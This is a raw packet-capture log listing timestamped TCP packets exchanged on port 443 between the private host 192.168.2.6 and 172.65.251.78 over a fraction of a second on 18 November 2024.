                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436044931 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436054945 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436096907 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436245918 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436259985 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436296940 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436306000 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436332941 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436347961 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436754942 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436769009 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436816931 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436825037 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.436860085 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437340021 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437355042 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437400103 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437408924 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437454939 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437911034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437926054 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437969923 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.437978029 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438019037 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438199043 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438211918 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438254118 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438261986 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438297033 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438522100 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438536882 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438576937 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438584089 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.438620090 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439203978 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439217091 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439268112 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439276934 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439323902 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439687967 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439707994 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439742088 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439750910 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439775944 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.439794064 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440032959 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440049887 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440088987 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440098047 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440124989 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440146923 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440248013 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440264940 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440303087 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440310955 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440337896 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.440367937 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.441297054 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.479511976 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.479532957 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.479749918 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.479767084 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.479815006 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.480837107 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.480854034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.480916023 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.480926037 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.480964899 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481405973 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481420994 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481473923 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481482029 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481517076 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481657028 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481677055 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481724024 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481734037 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.481769085 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.548965931 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.548991919 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.549052954 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.549068928 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.549110889 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550472021 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550502062 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550554037 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550563097 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550601959 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550864935 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550935984 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550945997 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.550964117 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551008940 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551300049 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551346064 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551367044 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551373959 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551388025 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551419020 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551630974 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551652908 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551702976 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551712036 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.551748991 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.552006960 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.552025080 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.552109957 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.552119017 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.552160025 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553020954 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553036928 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553088903 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553097010 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553133011 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553232908 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553251028 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553282976 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553291082 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553313017 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553333998 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553750038 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553767920 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553816080 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553822994 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553847075 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553858042 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553865910 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553877115 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553886890 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.553920031 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554055929 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554069996 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554109097 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554119110 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554155111 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554619074 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554634094 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554677963 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554691076 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554703951 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554713964 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.554749966 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555432081 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555448055 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555520058 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555531025 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555545092 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555566072 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555582047 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555589914 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555604935 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.555614948 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556047916 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556061983 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556102037 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556112051 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556133032 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556406975 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556425095 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556467056 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.556474924 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557301998 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557315111 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557365894 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557374001 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557626963 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557643890 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557682037 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557691097 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.557707071 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.558094025 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.558106899 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.558151960 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.558161020 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.558187008 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.596626043 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.596661091 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.596760988 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.596837997 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.596873999 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.598643064 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.598665953 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.598731041 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.598748922 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.598793030 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599354029 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599381924 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599524975 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599524975 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599545956 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599591017 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599616051 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599668980 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599684954 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.599715948 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.645948887 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.645977020 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.645987034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.646019936 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.646099091 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.646193027 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667519093 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667551994 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667743921 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667757034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667798996 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667809010 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667824030 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667848110 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667879105 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667886972 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667907000 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.667931080 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668231010 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668253899 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668401957 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668414116 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668466091 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668751001 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668773890 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668936014 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.668943882 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669018030 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669045925 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669066906 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669074059 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669203043 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669814110 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669858932 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669909000 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669917107 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669964075 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.669985056 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670279026 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670303106 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670403004 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670411110 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670428038 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670450926 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670522928 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670542955 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670604944 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670613050 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.670660973 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671111107 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671134949 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671227932 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671236038 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671284914 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671456099 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671478987 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671546936 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671555042 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671601057 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671854973 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671876907 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671951056 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.671958923 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672002077 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672164917 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672187090 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672249079 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672256947 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672298908 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672420979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672441959 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672494888 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672502995 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672529936 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672564983 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672765017 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672794104 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672852993 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672862053 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672904968 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.672991037 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.673012018 CET44349752172.65.251.78192.168.2.6
